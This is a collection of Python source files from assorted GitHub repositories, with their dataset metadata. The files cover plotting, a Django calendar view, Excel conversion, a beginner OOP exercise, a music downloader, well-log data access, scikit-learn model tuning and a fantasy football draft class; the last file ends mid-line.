axis_ranges = [None, None]\n\n if contour:\n plotname = outbase + '_contour.pdf'\n logging.info('Making contour plot \\'{}\\''.format(plotname))\n plot_graphs(all_graphs, r'contour.*' + err_rgx, plotname, True, axis_ranges)\n\n if errorbars:\n plotname = outbase +'_central.pdf'\n logging.info('Making central results plot \\'{}\\''.format(plotname))\n plot_graphs(all_graphs, r'fit.*' + err_rgx, plotname, False, axis_ranges)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Script for creating plots comparing'\n ' different uncertainty shapes')\n parser.add_argument('inputfiles', nargs='+', help='input files to use')\n parser.add_argument('-o', '--outbase', default='fit_results',\n help='base name for the output plots')\n parser.add_argument('-c', '--contour', default=True, action='store_true',\n help='make plot with contours')\n parser.add_argument('-nc', '--nocontour', dest='contour', action='store_false',\n help='do not make plot with contours')\n parser.add_argument('-e', '--errorbars', default=False, action='store_true',\n help='make plot with errorbars')\n parser.add_argument('-ne', '--noerrorbars', dest='errorbars', action='store_false',\n help='do not make plot with errorbars')\n parser.add_argument('-l', '--errlevel', type=str, default='1.00',\n help='desired error level (has to be present in files)')\n parser.add_argument('-z', '--zoom', help='zoom into desired region', default='')\n\n args = parser.parse_args()\n\n r.gROOT.SetBatch()\n r.gROOT.ProcessLine('gErrorIgnoreLevel = 1001')\n\n main(args.inputfiles, args.contour, args.errorbars, args.outbase, args.errlevel,\n args.zoom)\n","repo_name":"tmadlener/NewPolFramework","sub_path":"polFit/make_contour_comp_plots.py","file_name":"make_contour_comp_plots.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24984512172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n----------------------------------------------------------------------------------------------------\n* Project Name : SQL_memOJi\n* File Name : views.py\n* Description : \n* Create Time : 2021-04-04 00:48:04\n* Version : 1.0\n* Author : Steve X\n* GitHub : https://github.com/Steve-Xyh/SQL_memOJi\n----------------------------------------------------------------------------------------------------\n* Notice\n- \n- \n----------------------------------------------------------------------------------------------------\n'''\n\nimport json\nfrom django.shortcuts import render\nimport datetime\nfrom user.models import Student, User, Classroom\nfrom coding.models import Exam,Exercise\n#XXX(Seddon):默认按照中国时区\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj,datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return json.JSONEncoder.default(self,obj)\n\ndef calendar(request):\n '''Render calendar template'''\n identity = request.user.identity()\n print(identity)\n if request.user.is_superuser: # 超级用户可查看所有数据\n conditions = {\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n elif identity == 'teacher':\n conditions = {\n 'classroom__in' : request.user.teacher.teach_room(),\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n elif identity == 'teacher_student':\n conditions_teacher = {\n 'classroom__in' : request.user.teacher.teach_room(),\n 'active' : True\n }\n conditions_student = {\n 'classroom' : request.user.student.classroom,\n 'active' : True\n }\n exams_list_teacher = Exam.objects.order_by('publish_time').filter(**conditions_teacher)\n exer_list_teacher = Exercise.objects.order_by('publish_time').filter(**conditions_teacher)\n exams_list_student = Exam.objects.order_by('publish_time').filter(**conditions_student)\n exer_list_student = Exercise.objects.order_by('publish_time').filter(**conditions_student)\n exams_list = exams_list_teacher | exams_list_student\n exer_list = exer_list_teacher | exer_list_student\n elif identity == 'student':\n conditions = {\n 'classroom' : request.user.student.classroom,\n 'active' : True\n }\n exams_list = Exam.objects.order_by('publish_time').filter(**conditions)\n exer_list = Exercise.objects.order_by('publish_time').filter(**conditions)\n else:\n exams_list = Exam.objects.none()\n exer_list = Exercise.objects.none()\n\n content = {\n 'exams_list': exams_list,\n 'exer_list': exer_list,\n }\n calc_list = []\n # {% url 'coding:coding-editor' 'exam' exam.exam_id exam.first_ques %}\n for exam in exams_list:\n calc_list.append({'title':exam.exam_name,'start':exam.start_time + datetime.timedelta(hours=8),'end':exam.end_time + datetime.timedelta(hours=8), 'url':\"/coding/coding-editor/exam/\" + str(exam.exam_id )+ \"/\" + str(exam.first_ques)})\n for exer in exer_list:\n # calc_list.append({'title':exer.exer_name,'start':exer.publish_time + datetime.timedelta(hours=8)})\n calc_list.append({'title':exer.exer_name,'start':exer.start_time + datetime.timedelta(hours=8),'end':exer.end_time + datetime.timedelta(hours=8), 'url':\"/coding/coding-editor/exer/\" + str(exer.exer_id )+ \"/\" + str(exer.first_ques)})\n return render(request, 'iCalendar/calendar.html', {'spots':json.dumps(calc_list,cls=DateEncoder)})","repo_name":"Steve-Xyh/SQL_memOJi","sub_path":"src/iCalendar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"36449203400","text":"import openpyxl\n\n# 1. 엑셀 파일 열기\nworkbook = openpyxl.load_workbook('data.xlsx')\n# 현재 활성 중인 워크시트를 선택하는 방법\nworksheet = workbook.active\n\n# 2. 데이터 읽어서 딕셔너리 만들기\nresult_dic = {}\nfor row in worksheet.iter_rows(min_row=1, values_only=True):\n key = str(row[0]) + \"#\" + str(row[1])\n values = str(row[2]).split('\\n') if row[2] else ['']\n result_dic[key] = values\n\n# 3. 딕셔너리 출력하기\nprint(result_dic)\n\n# 4. 결과 엑셀 파일 쓰기\noutput_workbook = openpyxl.Workbook()\noutput_worksheet = output_workbook.active\nfor key, values in result_dic.items():\n for value in values:\n if value:\n output_worksheet.append([key, value])\n else:\n output_worksheet.append([key, \"\"])\n\noutput_workbook.save('output.xlsx')","repo_name":"happyhillll/work","sub_path":"intothecodingworld/task02/task02_minkyeong.py","file_name":"task02_minkyeong.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35982716957","text":"# Creating new instances of class objects can be a great way to keep track of values using attributes associated with the object.\n# The values of these attributes can be easily changed at the object level. The following code illustrates a famous quote by George Bernard Shaw, using objects to represent people.\n# Fill in the blanks to make the code satisfy the behavior described in the quote.\n\nclass Person():\n apples = 0\n ideas = 0\n\n\njohanna = Person()\njohanna.apples = 1\njohanna.ideas = 1\n\nmartin = Person()\nmartin.apples = 2\nmartin.ideas = 1\n\n\ndef exchange_apples(you, me):\n temp = you.apples\n you.apples = me.apples\n me.apples = temp\n return you.apples, me.apples\n\n\ndef exchange_ideas(you, me):\n temp = you.ideas\n you.ideas += me.ideas\n me.ideas += temp\n return you.ideas, me.ideas\n\n\nexchange_apples(johanna, martin)\nprint(\"Johanna has {} apples and Martin has {} apples\".format(johanna.apples, martin.apples))\nexchange_ideas(johanna, martin)\nprint(\"Johanna has {} ideas and Martin has {} ideas\".format(johanna.ideas, martin.ideas))\n","repo_name":"AbuBakkar32/Machine-Learning-Practice","sub_path":"Coursera Certification Course/Google Crash Course Python/Function (OOP)/Function Practice/Practice 5.py","file_name":"Practice 5.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"16642222208","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: HJK\n@file: music.py\n@time: 2019-01-27\n\nmusic object\n\n\"\"\"\n\nimport os\nimport re\nimport datetime\nimport logging\nimport click\nimport requests\nfrom . import config\nfrom .utils import colorize\n\n\nclass Music:\n \"\"\"\n 定义music对象,\n 包括基本属性(如title,singer,url等)\n 以及一些方法(如download,info等)\n \"\"\"\n\n def __init__(self):\n self.idx = 0\n self.id = \"\"\n self.title = \"\"\n self.ext = \"mp3\"\n self.singer = \"\"\n self.album = \"\"\n self.size = \"\"\n self.rate = \"\"\n self.source = \"\"\n self.lyrics = \"\"\n self.cover = \"\"\n self._duration = \"\"\n self._url = \"\"\n self.outdir = config.get(\"outdir\")\n self.verbose = config.get(\"verbose\")\n self.logger = logging.getLogger(__name__)\n\n def __str__(self):\n \"\"\" 在打印详情时调用 \"\"\"\n idx = colorize(\"[ %s ] \" % self.idx, \"cyan\")\n source = colorize(\"%s\" % self.source.upper(), self.source)\n return \"\\n ------------ \\n\" + _(\n \" -> 来源: {idx}{source} #{id}\\n\"\n \" -> 歌曲: {title}\\n\"\n \" -> 歌手: {singer}\\n\"\n \" -> 专辑: {album}\\n\"\n \" -> 时长: {duration}\\n\"\n \" -> 大小: {size}MB\\n\"\n \" -> 比特率: {rate}\\n\"\n \" -> URL: {url} \\n\"\n \" -> 歌词: {lyrics} \\n\"\n \" -> 封面: {cover} \\n\"\n ).format(\n idx=idx,\n source=source,\n id=self.id,\n title=self.title,\n singer=self.singer,\n album=self.album,\n duration=self.duration,\n size=self.size,\n rate=self.rate,\n url=self.url,\n lyrics=self.lyrics,\n cover=self.cover,\n )\n\n @property\n def avaiable(self):\n \"\"\" 是否有效,如果URL为None或大小为0则无效 \"\"\"\n return self.url and self.size\n\n @property\n def name(self):\n \"\"\" 歌曲文件名 \"\"\"\n return \"%s - %s.%s\" % (self.singer, self.title, self.ext)\n\n @property\n def duration(self):\n \"\"\" 持续时间 H:M:S \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, seconds):\n self._duration = str(datetime.timedelta(seconds=int(seconds)))\n\n @property\n def info(self):\n \"\"\" 歌曲摘要信息,列出搜索歌曲时使用 \"\"\"\n idx = colorize(\" [ %2s ] \" % self.idx, \"cyan\")\n source = colorize(\"%7s\" % self.source.upper(), self.source)\n size = colorize(\"%5sMB\" % self.size, \"yellow\")\n title = colorize(self.title, \"yellow\")\n v = colorize(\" | \", self.source)\n h = colorize(\" - \", self.source)\n return (\n idx\n + source\n + v\n + self.duration\n + h\n + size\n + h\n + self.singer\n + h\n + title\n + h\n + self.album\n )\n\n @property\n def row(self):\n \"\"\" 歌曲摘要信息,列出搜索歌曲时使用PrettyTable \"\"\"\n keywords = re.split(\";|,|\\s|\\*\", config.get(\"keyword\"))\n\n def highlight(s, k):\n return s.replace(k, colorize(k, \"xiami\")).replace(\n k.title(), colorize(k.title(), \"xiami\")\n )\n\n ht_singer = self.singer if len(self.singer) < 30 else self.singer[:30] + \"...\"\n ht_title = self.title if len(self.title) < 30 else self.title[:30] + \"...\"\n ht_album = self.album if len(self.album) < 20 else self.album[:20] + \"...\"\n for k in keywords:\n if not k:\n continue\n ht_singer = highlight(ht_singer, k)\n ht_title = highlight(ht_title, k)\n ht_album = highlight(ht_album, k)\n\n size = \"%sMB\" % self.size\n ht_size = size if int(self.size) < 8 else colorize(size, \"flac\")\n\n return [\n colorize(self.idx, \"baidu\"),\n ht_title,\n ht_singer,\n ht_size,\n self.duration,\n ht_album,\n self.source.upper(),\n ]\n\n @property\n def url(self):\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\" 设置URL的时候同时更新size大小 \"\"\"\n try:\n r = requests.get(\n url,\n stream=True,\n headers=config.get(\"wget_headers\"),\n proxies=config.get(\"proxies\"),\n )\n self._url = url\n size = int(r.headers.get(\"Content-Length\", 0))\n # 转换成MB并保留两位小数\n self.size = round(size / 1048576, 2)\n except Exception as e:\n self.logger.info(_(\"请求失败: {url}\").format(url=url))\n self.logger.info(e)\n\n @property\n def fullname(self):\n \"\"\" 唯一有效的完整路径,如果冲突则在名称加数字,如music(1).mp3 \"\"\"\n outfile = os.path.abspath(os.path.join(self.outdir, self.name))\n if os.path.exists(outfile):\n name, ext = self.name.rsplit(\".\", 1)\n names = [x for x in os.listdir(self.outdir) if x.startswith(name)]\n names = [x.rsplit(\".\", 1)[0] for x in names]\n suffixes = [x.replace(name, \"\") for x in names]\n # filter suffixes that match ' (x)' pattern\n suffixes = [\n x[2:-1] for x in suffixes if x.startswith(\" (\") and x.endswith(\")\")\n ]\n indexes = [int(x) for x in suffixes if set(x) <= set(\"0123456789\")]\n idx = 1\n if indexes:\n idx += sorted(indexes)[-1]\n outfile = os.path.abspath(\n os.path.join(self.outdir, \"%s (%d).%s\" % (name, idx, ext))\n )\n return outfile\n\n def download(self):\n \"\"\" 下载音乐 \"\"\"\n if config.get(\"verbose\"):\n click.echo(str(self))\n else:\n click.echo(self.info)\n\n music_file = self.fullname.replace(\"?\", \"\")\n self._download_file(self.url, music_file, stream=True)\n\n if config.get(\"lyrics\") and self.lyrics:\n lyrics_file = (\n music_file.rpartition(\".\")[0] + \".\" + self.lyrics.rpartition(\".\")[-1]\n )\n self._download_file(self.lyrics, lyrics_file)\n\n if config.get(\"picture\") and self.cover:\n cover_file = music_file.rpartition(\".\")[0] + \".jpg\"\n self._download_file(self.cover, cover_file)\n\n click.echo(\"-------------\\n\")\n\n def _download_file(self, url, outfile, stream=False):\n \"\"\"\n 下载文件用的辅助函数\n :param url: 下载地址\n :param outfile: 含完整���径的文件名\n :param stream: 是否需要进度条\n :return:\n \"\"\"\n try:\n r = requests.get(\n url,\n stream=stream,\n headers=config.get(\"wget_headers\"),\n proxies=config.get(\"proxies\"),\n )\n if stream:\n total_size = int(r.headers[\"content-length\"])\n with click.progressbar(length=total_size, label=_(\"下载中...\")) as bar:\n with open(outfile, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n bar.update(len(chunk))\n else:\n with open(outfile, \"wb\") as f:\n f.write(r.content)\n click.echo(_(\"已保存到: {outfile}\").format(outfile=outfile))\n except Exception as e:\n click.echo(\"\")\n self.logger.error(_(\"下载失败: \") + \"\\n\")\n self.logger.error(_(\"URL: {url}\").format(url=self.url) + \"\\n\")\n self.logger.error(_(\"位置: {outfile}\").format(outfile=outfile) + \"\\n\")\n if self.verbose:\n self.logger.error(e)\n","repo_name":"lszxiao/mymusic","sub_path":"music_dl/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":8020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"913014707","text":"import copy\nimport numpy as np\n\n\n# TODO: try to generalize using __getattribute__\n# TODO: caching\nclass DataProvider:\n def __init__(self, lasfile):\n self.lasfile = lasfile\n\n def _find_well_log(self, data):\n if \"mnemonic\" in data:\n mnemonic = data.pop(\"mnemonic\")\n else:\n mnemonic = \"\"\n \n for index, log in enumerate(self.lasfile[\"curve\"]):\n log[\"mnemonic\"]\n if log[\"mnemonic\"] == mnemonic:\n log[\"data\"] = self.lasfile[\"data\"][index]\n well_log = log\n break\n else:\n well_log = False\n\n return well_log\n\n def _get_well_log_label(self, data):\n data = copy.deepcopy(data)\n well_log = self._find_well_log(data[\"x\"])\n\n if not well_log:\n msg = f\"No well logs found for query: {data}\"\n raise ValueError(msg)\n else:\n if well_log[\"unit\"]:\n label = f\"{well_log['mnemonic']} ({well_log['unit']})\"\n else:\n label = well_log[\"mnemonic\"]\n \n return label\n\n def get_label(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_log\")\n method = getattr(self, f\"_get_{source}_label\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_label\")\n label = method(data)\n return label\n\n # TODO: generalize (all get_* look the same)\n def get_range(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_range\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_range\")\n rng = method(data)\n return rng\n\n def get_line(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_line\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_line\")\n rng = method(data)\n return rng\n\n def get_marker(self, data):\n print(f\"DataProvider.get_marker\\n{data}\\n\")\n raise NotImplementedError(\"DataProvider.get_marker\")\n\n def get_text(self, data):\n print(f\"DataProvider.get_text\\n{data}\\n\")\n raise NotImplementedError(\"DataProvider.get_text\")\n\n def _get_well_log_data(self, data):\n d = {}\n for k, v in data.items():\n # TODO: process multiples\n well_log = self._find_well_log(v)\n if not well_log:\n msg = f\"Well log not found for query {data}\"\n raise ValueError(msg)\n d[k] = well_log\n\n return d\n\n def _get_well_logs_range(self, data):\n well_log = self._find_well_logs(data)\n if not well_log:\n msg = f\"Well log not found for query {data}\"\n raise ValueError(msg)\n else:\n npdata = well_log[\"data\"]\n value_range = [\n np.nanmin(npdata),\n np.nanmax(npdata),\n ]\n\n return value_range\n\n # def _get_well_logs_line(self, data):\n # if \"alias\" in data:\n # alias = data[\"alias\"]\n # prop, _ = self.datamanager.get_property_from_mnem(alias)\n # else:\n # well_logs = self._find_well_logs(data)\n # if not well_logs:\n # msg = f\"Well log not found for query {data}\"\n # raise ValueError(msg)\n # prop = well_logs[0].property\n\n # line_prop = prop.default_line_property\n # if line_prop is None:\n # line = {\"color\": \"k\"}\n # else:\n # line = {}\n # line[\"color\"] = line_prop.color\n # line[\"width\"] = line_prop.width\n # line[\"style\"] = line_prop.style\n # line[\"alpha\"] = line_prop.alpha\n # line = {k: v for k, v in line.items() if v is not None}\n\n # return line\n\n def get_data(self, data):\n data = copy.deepcopy(data)\n source = data.pop(\"source\", \"well_logs\")\n method = getattr(self, f\"_get_{source}_data\", None)\n if method is None:\n raise NotImplementedError(f\"DataProvider._get_{source}_data\")\n return method(data)\n","repo_name":"giecaruff/LAS2Plot","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38127825090","text":"################################################\n##### Superconductivity Optimizer Notebook #####\n################################################\n# Trains models to predict critical temperatures based on features found with \"*../code/get_featurizers.ipynb*\". \n# Imports data from \"*../data/supercon_feat.csv*\", which is produced in *get_featurizers.ipynb*. The orginal data is from the supercon database. \n# Compute-Farm version\n# Author: Sylphrena Kleinsasser\n################################################\n\n######################################################\n### Import Libraries / Define Import Data Function ###\n######################################################\n# %% \n#general imports:\n# import warnings #to suppress grid search warnings\nimport time\nimport argparse\nimport warnings\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\n# import seaborn as sns #heatmaps\n\n#regression models:\n# from mlens.ensemble import SuperLearner\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor, BaggingRegressor, ExtraTreesRegressor, RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, Lasso, ElasticNet, SGDRegressor, BayesianRidge\nfrom sklearn.svm import SVR\n\n#various ML tools:\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold, cross_val_predict, cross_val_score\nfrom sklearn.metrics import accuracy_score, recall_score, r2_score, mean_absolute_error, mean_squared_error\n# from skopt import BayesSearchCV #bayesian optimization\n\n#imports custom libraries (shared functions)\nimport dependancies.shared_functions as sfn\n\n###################################################\n######## Define and Validate CLI Arguments ########\n###################################################\n# %% \nsfn.syncdir() #ensures working directory is inside code on compute farm\n\nparser = argparse.ArgumentParser(description=\"A program that optimizes regression models for predicting superconductor critical temperatures.\")\nparser.add_argument('-s', '--samplesize', action='store', dest='limit', default=1000, help='Limit the GridSearch Data Sample Size. Value must be \\'all\\' or a number between 0 and 16414')\nparser.add_argument('-a', '--all', action='store_true', dest='all', help='Boolean option to enable all regression models. Overrides individual toggles.')\nparser.add_argument('-sv', '--svr', action='store_true', dest='SVR', help='Boolean option to enable the Support Vector Machines (Linear) model.')\nparser.add_argument('-svp', '--svrpoly', action='store_true', dest='SVR_POLY', help='Boolean option to enable the Support Vector Machines (Poly) model.')\nparser.add_argument('-el', '--elastic', action='store_true', dest='ELASTIC', help='Boolean option to enable the Elastic Net Regression model.')\nparser.add_argument('-dt', '--decisiontree', action='store_true', dest='DT', help='Boolean option to enable the Decision Tree Regression model.')\nparser.add_argument('-rf', '--randomforest', action='store_true', dest='RFR', help='Boolean option to enable the Random Forest Regression model.')\nparser.add_argument('-knn', '--knn', action='store_true', dest='KNN', help='Boolean option to enable the KNeighbors Regression model.')\nparser.add_argument('-et', '--extratrees', action='store_true', dest='TREES', help='Boolean option to enable the Extra Trees Regression model.')\nparser.add_argument('-sgd', '--stochastic', action='store_true', dest='SGD', help='Boolean option to enable the Stochastic Gradient Descent model.')\nparser.add_argument('-by', '--bayes', action='store_true', dest='BAYES', help='Boolean option to enable the Bayesian Regression model.')\n\nargs = parser.parse_args()\n\nlimit = args.limit\nif 0 < int(limit) < 16414:\n pass\nelif str(limit) == 'all':\n limit = 16414\nelse:\n raise Exception(\"Invalid GridSearch Data Sample Size Limit. Value must be 'all' or a number between 0 and 16414.\") #i am once again asking for a valid input :(\n\n#####################################################\n########### Setup Models for GridSearchCV ###########\n#####################################################\n# %% \n\nsfn.import_data(replace_inf=False) #grab data\n\n#drop data that will not be used for optimization after shuffle, to limit defined in function\nlimit = int(limit)\ntrain_data = sfn.train_data.iloc[:limit]\ntest_data = sfn.test_data.iloc[:limit]\ntrain_target = sfn.train_target.iloc[:limit]\ntest_target = sfn.test_target.iloc[:limit]\n\n#get number of rows and columns for use in parameters\nn_features = sfn.data.shape[1]\nn_samples = sfn.data.shape[0]\n\n#define parameters that will be searched with GridSearchCV\nSVR_PARAMETERS = {\"kernel\": [\"poly\",\"rbf\",\"sigmoid\"], \"degree\": np.arange(1,10,2), \"C\": np.linspace(0,1000,5), \"epsilon\": np.logspace(-3, 3, 5),\n \"gamma\": [1.00000000e-03, 5.99484250e-02, 4.64158883e-01, 3.59381366e+00, 1.00000000e+01, \"scale\", \"auto\"]}\nSVR_POLY_PARAMETERS = {\"C\": np.linspace(0,1000,5), \"epsilon\": np.logspace(-3, 3, 5), \n \"gamma\": [1.00000000e-03, 5.99484250e-02, 4.64158883e-01, 3.59381366e+00, 1.00000000e+01, \"scale\", \"auto\"]}\nELASTIC_PARAMETERS = {\"alpha\": np.logspace(-10, 2, 5), 'l1_ratio': np.arange(0, 1, 0.1)}\nDT_PARAMETERS = {'criterion': ['squared_error', 'friedman_mse', 'absolute_error', 'poisson'], 'max_depth': [None, 1, 3, 5, 7], \n 'max_features': [None, 'sqrt', 'log2', 0.3, 0.5, 0.7, n_features//2, n_features//3, ],\n 'min_samples_split': [3, 2, 0.3, 0.5, n_samples//2, n_samples//3, n_samples//5], \n 'min_samples_leaf':[1, 0.3, 0.5, n_samples//2, n_samples//3, n_samples//5]}\nRFR_PARAMETERS = {'max_features': ['auto', 1, 2, 3, 4, 5], 'n_estimators': np.linspace(1,1000,20,dtype=int)}\nKNN_PARAMETERS = {'n_neighbors': np.linspace(1,15,5,dtype=int), 'algorithm': ['auto', 'ball_tree', 'kd_tree', 'brute'], \n 'metric':['euclidean', 'manhattan']}\nTREES_PARAMETERS = {'n_estimators': np.linspace(1,750,15,dtype=int)} \nSGD_PARAMETERS = {'loss': ['hinge', 'log_loss', 'log', 'modified_huber', 'squared_hinge', 'perceptron', 'squared_error', 'huber', 'epsilon_insensitive', 'squared_epsilon_insensitive'],\n 'penalty': ['l1', 'l2', 'elasticnet'], \"alpha\": np.logspace(-4, 5, 5)}\nBAYES_PARAMETERS = {'alpha_init':[1, 1.1, 1.2, 1.3, 1.4, 1.5, 1.9], 'lambda_init': [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-9]}\n\nmodels = [[(args.SVR, args.all), \"Support Vector Machines (Linear)\", SVR, SVR_PARAMETERS, {'max_iter': -1}],\n [(args.SVR_POLY, args.all), \"Support Vector Machines (Poly)\", SVR, SVR_POLY_PARAMETERS, {'max_iter': -1}],\n [(args.ELASTIC, args.all), \"Elastic Net Regression\", ElasticNet, ELASTIC_PARAMETERS, {'fit_intercept': True}],\n [(args.DT, args.all), \"Decision Tree Regression\", DecisionTreeRegressor, DT_PARAMETERS, {'random_state': 43}],\n [(args.RFR, args.all), \"Random Forest Regression\", RandomForestRegressor, RFR_PARAMETERS, {'bootstrap': True, 'n_jobs': -1}],\n [(args.KNN, args.all), \"KNeighbors Regression\", KNeighborsRegressor, KNN_PARAMETERS, {'n_jobs': -1}],\n [(args.TREES, args.all), \"Extra Trees Regression\", ExtraTreesRegressor, TREES_PARAMETERS, {'n_jobs': -1}],\n [(args.SGD, args.all), \"Stochastic Gradient Descent\", SGDRegressor, SGD_PARAMETERS, {'fit_intercept': True, 'max_iter': 1500}],\n [(args.BAYES, args.all), \"Bayesian Regression\", BayesianRidge, BAYES_PARAMETERS, {'fit_intercept': True}]]\n\ndef optimize_model(model_name, regressor, parameters, fixed_params): #performs grid search on a given model with specified search and fixed model parameters and saves results to csv\n global results #variables that we want to define globally (outside of this funtion)\n #this function will allow us to use multiprocessing to do multiple grid searches at once.\n try: #try-excepts handles errors without ending process and allows us to read the error later on\n start_time = time.time() #sets start time for function so we can record processing time\n #define model, do grid search\n search = GridSearchCV(regressor(**fixed_params), #model\n param_grid = parameters, #hyperparameters\n scoring = 'r2', #metrics for scoring\n return_train_score = False, #we want test score\n cv = 3, #number of folds\n n_jobs = -1, #amount of threads to use\n # refit = 'r2', #metric we are optimizing (no need to set for single metric scorring)\n verbose = 1) #how much output to send while running\n\n search.fit(train_data, train_target) #fit the models\n return (model_name, search.best_estimator_, search.best_params_, \"Best Score: \" + str(search.best_score_), \"Time Elapsed: \" + str(time.time() - start_time)) #record results\n except Exception as error: #catch any issues and record them\n return (model_name, \"ERROR\", \"ERROR\", error) #record errors\n\n####################################################\n#################### Run Search ####################\n####################################################\n# %% \n\nresults = []\nwarnings.filterwarnings('ignore') #got tired of non-converging errors\nfor [enabled, model_name, regressor, parameters, fixed_params] in models: #optimize enabled models\n if True in enabled:\n print(\"Starting GridSearchCV on {}\".format(model_name))\n results.append(optimize_model(model_name, regressor, parameters, fixed_params))\n else:\n print(f\"Skipping {model_name} as it is not enabled.\")\n\nresult_df = pd.DataFrame(results)\nresult_df.to_csv('../data/optimization/optimize_gridsearch.csv', index=False) #saves data to './optimize_results.csv'\n","repo_name":"sylphrena0/classe","sub_path":"code/model_optimizer.py","file_name":"model_optimizer.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34985870209","text":"\"\"\"Representation of a fantasy football draft.\"\"\"\nfrom src.model.general.phys_representations import Player, Team\nfrom src.model.general.settings import LeagueSettings\n\n\nclass Draft:\n \"\"\"Representation of a draft, with functions to modify the picks in the draft.\"\"\"\n\n def __init__(\n self,\n order: list[Team],\n rounds: int,\n player_pool: list[Player],\n settings: LeagueSettings,\n ) -> None:\n \"\"\"\n Create a draft, tracking the teams, available players, and settings of the league.\n\n :param order: List of teams participating in snake draft, sorted by the order they pick in round 1\n :param rounds: Number of rounds in draft\n :param player_pool: Players available to pick from in the draft\n :param settings: Settings of the league the draft is occurring in\n \"\"\"\n self._order: list[Team] = order\n self._rounds: int = rounds\n self._picks: list[Player] = []\n self._undrafted: list[Player] = player_pool\n self._settings: LeagueSettings = settings\n\n def set_pick(self, player: Player, pick_num: int | None = None) -> None:\n \"\"\"\n Set the xth pick of the draft (starting at 1) as the given player.\n\n :param player: Player who was drafted at given spot (or next spot)\n :param pick_num: If int, location in draft player was picked. If None, evaluates internally to next pick\n :raises ValueError: Pick number provided out of range (not a past pick or immediate next pick)\n :raises RuntimeError: Player unavailable to pick, can't add another pick\n \"\"\"\n if player not in self._undrafted:\n raise RuntimeError(f\"Player {player} not available to pick\")\n if (not pick_num) or (pick_num - 1 == len(self._picks)):\n # If adding next pick, remove player from undrafted and add to next pick's team\n if len(self._picks) == len(self._order) * self._rounds:\n raise RuntimeError(\"Can't add another pick. Draft already complete.\")\n self.pick_num_to_team(len(self._picks) + 1).roster.add_player(player)\n self._undrafted.remove(player)\n self._picks.append(player)\n elif (len(self._picks) < pick_num - 1) or (pick_num <= 0):\n raise ValueError(\n f\"Pick number {pick_num} is out of range. The next pick is pick {len(self._picks) + 1}\"\n )\n else:\n # If changing pick, remove player from team and add to player pool.\n self.pick_num_to_team(pick_num).roster.remove_player(player)\n self._undrafted.append(self._picks[pick_num - 1])\n # Then remove new player from player pool and to team\n self.pick_num_to_team(pick_num).roster.add_player(player)\n self._undrafted.remove(player)\n self._picks[pick_num - 1] = player\n\n def delete_picks(self, num_picks: int | None) -> None:\n \"\"\"\n Deletes the given numbers of picks from end of the draft\n\n :param num_picks: Number of picks to delete from end of draft. None to delete all picks.\n \"\"\"\n new_num_picks = num_picks if num_picks else len(self._picks)\n for pick in range(new_num_picks):\n self.pick_num_to_team(len(self._picks)).roster.remove_player(\n self._picks[-1]\n )\n self._undrafted.append(self._picks[-1])\n self._picks.pop()\n\n def pick_num_to_team(self, pick_num: int) -> Team:\n \"\"\"\n Convert a pick number to the team picking at that spot.\n\n :param pick_num: Pick number to convert (1-based)\n :raises ValueError: Pick number out of bounds of draft picks\n :return: Team picking at given pick number\n \"\"\"\n num_picks: int = len(self._order) * self._rounds\n if pick_num <= 0 or pick_num > num_picks:\n raise ValueError(f\"Pick number {pick_num} for draft with {num_picks} picks\")\n team_num = (pick_num - 1) % len(self._order)\n round = (pick_num - 1) // len(self._order) + 1\n if round % 2 == 0:\n team_num = len(self._order) - team_num - 1\n return 